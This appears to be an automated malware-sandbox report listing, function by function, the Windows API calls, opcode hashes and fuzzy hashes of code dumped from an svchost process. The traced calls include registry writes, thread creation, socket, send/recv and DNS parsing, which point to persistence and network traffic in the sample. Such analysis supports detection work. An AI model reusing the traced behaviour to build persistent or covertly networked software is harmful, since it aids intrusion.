                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 1314ACA4
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 1314ACB7
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314ACD3
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,-00000004,00000071,00000000,000F003F,?), ref: 1314ACFA
                                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,-00000004,00000070,00000000,00000001,?,00000104), ref: 1314AD36
                                                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 1314AD3F
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 1314AD4A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: PathSleep$AppendBackslashCloseEnvironmentOpenValueVariablelstrlenwnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3351196999-0
                                                                                                                                                                                                                                                          • Opcode ID: df98af59c271cf4eb92abddb90ebf49f7c78599eddc4f688432b86f896bc466f
                                                                                                                                                                                                                                                          • Instruction ID: e8ac087ec537ef643a7e4e5b40512e915baa8ea1b42b2ab4850eaaa40f01f91f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df98af59c271cf4eb92abddb90ebf49f7c78599eddc4f688432b86f896bc466f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40113D75A40219FFEB14ABA4CD45FEE7B7CAB04709F200070E605B6185E7B5AA44DB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 349 13144bd5-13144beb HeapCreate 350 13144c23-13144c2e 349->350 351 13144bed-13144c03 HeapCreate 349->351 352 13144c05-13144c15 HeapCreate 351->352 353 13144c22 351->353 352->353 354 13144c17-13144c1d GetProcessHeap 352->354 353->350 354->353
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00000000,00000000,LoadLibraryExA,?,1314338F,00000000,00016B00,LoadLibraryExA,?), ref: 13144BE2
                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,001E8480,1DCD6500,00016B00), ref: 13144BFA
                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,001E8480,05F5E100), ref: 13144C0C
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 13144C17
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Create$Process
                                                                                                                                                                                                                                                          • String ID: LoadLibraryExA
                                                                                                                                                                                                                                                          • API String ID: 846323464-2601528877
                                                                                                                                                                                                                                                          • Opcode ID: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                                                                                          • Instruction ID: df309c537f147d9e7df735f2a449fb756469b5c2332ceeb35925c3edc0e0c3b5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F0A7B1A012A56BCB04AF364EC0C4BAFDCE349358364AC3EF105D2504FB38884587B0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                                                                                          • PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          • PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Path$AppendBackslashEnvironmentVariablelstrlen
                                                                                                                                                                                                                                                          • String ID: C:\Windows\system32\regedit.exe$LoadLibraryExA
                                                                                                                                                                                                                                                          • API String ID: 3711117582-2466685467
                                                                                                                                                                                                                                                          • Opcode ID: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                                                                                          • Instruction ID: 40d1b3cb4e87c1594f7b209ae58ce819227e3fa9e4917f1197cc4b9cdaa05ffb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb94435e3141b6c6865afd970c13751078a8f23207b948a7b406e9d98e6884c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE09A76B4023067EA0077A58C4EFDA7A2CCB00A99B440030F902F92C0EB94E54286A9
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13144937
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,0000FA00,13144394,?,00000000,00000000), ref: 13144AB2
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(0000000A,?), ref: 13144B06
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000032,?,?,?), ref: 13144B25
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Sleep$CreateExitProcessThreadlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 409902211-0
                                                                                                                                                                                                                                                          • Opcode ID: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                                                                                          • Instruction ID: 6d998106411ceb65381bfd4e6dc3443c2a6c4742902684d26abc5299e1fbab67
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 075d2d43036dfda88634d388792c9ee31814f1ab77880507ee4d07b56597f8e7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9710276A80360EFC715EF99C9C5E5A7BF8FB86758F34002AE505E7244EB78A440CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetVersion.KERNEL32(00020000,76122E60,00000000), ref: 1314303C
                                                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(00000000,0000004A,00000000,0000003C), ref: 13143096
                                                                                                                                                                                                                                                          • StrStrIA.KERNELBASE(00000000,00000000,0000007B), ref: 131430B7
                                                                                                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 131430E2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CommandLineVersioninet_addr
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4064751120-0
                                                                                                                                                                                                                                                          • Opcode ID: 3b6e8ccc542d13fb3841947dc148e09b0a03c60278922c87ddf5565ef18440af
                                                                                                                                                                                                                                                          • Instruction ID: 0fbd0b764bc663820d1229e05fab6f52f8099b08dd94ad2b4e0f19df9f21a017
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b6e8ccc542d13fb3841947dc148e09b0a03c60278922c87ddf5565ef18440af
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B151A779740355BBE724ABA9CC8DF9A3B29EB82B18F14043DF145962C0EBB4A444CA65
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000000,76122E60,13143401), ref: 131432EF
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000000), ref: 13143303
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 32694325-0
                                                                                                                                                                                                                                                          • Opcode ID: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                                                                                          • Instruction ID: 36019c5d3645fadee2bcba3f0f1670733127cd8a2b67beb26c680348bd35dee3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d9b36f4f60a96a16bc1a5a1d74fd316fff9ecd044a6f1fb14842f02da6bf71c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF054B1A443316BFF08EBFD6D667962E9C9B49364F244437F505D2184EFA48001DAF0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                                                                                            • Part of subcall function 13144EC3: LeaveCriticalSection.KERNEL32(00000000,1314E31B,?,00000000,00000000,-00000004), ref: 13144ECE
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000001), ref: 131460FF
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,-00000004,0000003F,00000000), ref: 1314614E
                                                                                                                                                                                                                                                            • Part of subcall function 1315182B: EnterCriticalSection.KERNEL32(03C14050,00000000,00000000,761311A0,131461DD,00000000,00000000,000000FF), ref: 13151834
                                                                                                                                                                                                                                                            • Part of subcall function 1315182B: LeaveCriticalSection.KERNEL32(03C14050), ref: 13151845
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 131461F6
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 1314620F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSectionSleep$EnterLeave
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 890587828-0
                                                                                                                                                                                                                                                          • Opcode ID: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                                                                                          • Instruction ID: aa9922c8d6f98b1bcbd01e6166526c1982ba4151100d3d07f382ebb813d1f31a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3d4c390a716a34e06762df693a3c57ff7b247b2137afb7d70cd78e67ea98229
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B313974A00320EFCF15ABA8CD91A6C7666AF82A3CF380A35E451761D5DF74A941C790
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • DnsExtractRecordsFromMessage_W.DNSAPI(?,0000000F,?), ref: 13143A20
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExtractFromMessage_Records
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 894924593-0
                                                                                                                                                                                                                                                          • Opcode ID: 040fad8672cc04b73662c5183f947b973f0093001c29fd8d969619cf4801a019
                                                                                                                                                                                                                                                          • Instruction ID: 889d0642c4a5f7780838a2b68a0323b9f861a0611937f76247db74d3a55b1fca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 040fad8672cc04b73662c5183f947b973f0093001c29fd8d969619cf4801a019
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43B11DB5900249EFCB11DF98CC809DEBBB9FF49304F25496AE954E7210E771AA60CF61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • send.WS2_32(1314E1A7,?,00000000,13143425), ref: 1314DB5E
                                                                                                                                                                                                                                                          • recv.WS2_32(00000008,?,00000000,00020000), ref: 1314DBAD
                                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000000,?), ref: 1314DC07
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: recv$send
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1963230611-0
                                                                                                                                                                                                                                                          • Opcode ID: 1a505f471195cedca5a0429745c51f8ab3cc16ecf5a724b459f66d5316c02f36
                                                                                                                                                                                                                                                          • Instruction ID: a6d8a547d4d7dba041dffb0585ee0a10fe1e84b7311ab2876e372012bd6c3884
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a505f471195cedca5a0429745c51f8ab3cc16ecf5a724b459f66d5316c02f36
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1741DD3A604215AFDF16EBA8CC95DAE7779FF42610B64493CF422A3190EF70BA44CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • htons.WS2_32(00000FA0), ref: 131462FC
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 13146317
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,13143375,00016B00,LoadLibraryExA,?), ref: 13146326
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLasthtonssocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3100113635-0
                                                                                                                                                                                                                                                          • Opcode ID: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                                                                                          • Instruction ID: 65d3a68209b55ec02d1a8e1dcb1c20dd2b6278565e4f18be07d174e7e848d9e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4798562a01600ef3f9dd65a926da48208d44cdd9dd444a59f9dfde149f2742bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06F04CF56103A4AFDB08ABE4CD96BA976A89F0631CF140539E462D53C5E3FC8100D732
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433FC), ref: 1314AD7C
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(131433FC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314ADA1
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(131433FC), ref: 1314ADAA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseOpenValuelstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2964171075-0
                                                                                                                                                                                                                                                          • Opcode ID: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                                                                                          • Instruction ID: 463864c30009ddb7c9bf7bc6fec684855c3ce20d6730d88446eca340b249a078
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F0DA75740259BBF714EB90CD46FFDB77CAB10748F600074EB01BA1D4E7B4AA049625
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 131507CB
                                                                                                                                                                                                                                                            • Part of subcall function 131504BE: StrStrA.SHLWAPI(00000000,131414A8,?,00000000,00000000,?,?), ref: 131504EE
                                                                                                                                                                                                                                                            • Part of subcall function 131504BE: StrStrA.SHLWAPI(00000000,131414A8,00000000), ref: 13150525
                                                                                                                                                                                                                                                            • Part of subcall function 131504BE: StrStrA.SHLWAPI(?,131414A8), ref: 13150584
                                                                                                                                                                                                                                                            • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505F9,?,00000000,00000000), ref: 13144C42
                                                                                                                                                                                                                                                            • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C56
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Read$wnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4273485756-0
                                                                                                                                                                                                                                                          • Opcode ID: 3d81cade11f5510c2490e3098c0cacad6ea56a639b26170ee2863bcafc08764f
                                                                                                                                                                                                                                                          • Instruction ID: ca098031dc23aa5fec505e5fe3aa4a03d4b8a964c368ed561b756ff55a250eed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d81cade11f5510c2490e3098c0cacad6ea56a639b26170ee2863bcafc08764f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F0BE79A00219BBCF105F9A8D04ECF7E6DEF82290F148039F918A6110DA709A10EAF0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,76122E60,76122E60,00020000,13143011,00000020,00020000,76122E60,00000000), ref: 13144F91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: d5a463f49cfdf1fecdaeaf2fcf4134f1256c228813accd60a4bb374119a63aea
                                                                                                                                                                                                                                                          • Instruction ID: 860df09072765b189afd9b0125f928941ab8b0913a4eeec92bdc70b0a7bc24d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a463f49cfdf1fecdaeaf2fcf4134f1256c228813accd60a4bb374119a63aea
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAE0C232B4563067D561116EBC04F8B6B59DBD1B61F294132F900B6158DB20980042E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • getsockname.WS2_32(00000041,00000000,00000041), ref: 1314D1AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: getsockname
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3358416759-0
                                                                                                                                                                                                                                                          • Opcode ID: 9a956b9c07f47dc36a9e4558e2105b614252b6c184e43ec9b330204f38b3dc1f
                                                                                                                                                                                                                                                          • Instruction ID: 47df7a40e1ac024c00daa250fcf612bec4e9fb83b135031a960e4ee8435f88d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a956b9c07f47dc36a9e4558e2105b614252b6c184e43ec9b330204f38b3dc1f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3E012B4900329AFDB41EBA5CA84A8A77BCF70130CF548565D801A2284E3B496449FA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                                                                                            • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2779004725.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Path$AppendBackslashCreateEnvironmentFileVariable
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2777513326-0
                                                                                                                                                                                                                                                          • Opcode ID: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                                                                                          • Instruction ID: a0fb1ee771b706fa743988e8952bd7e380549e7e2bd202f0058836edd53182ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2C048A8BA1250BEFE6C1B309D5FF2B1A1C8701A02F38466CB202E8880BAD4A9108420
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%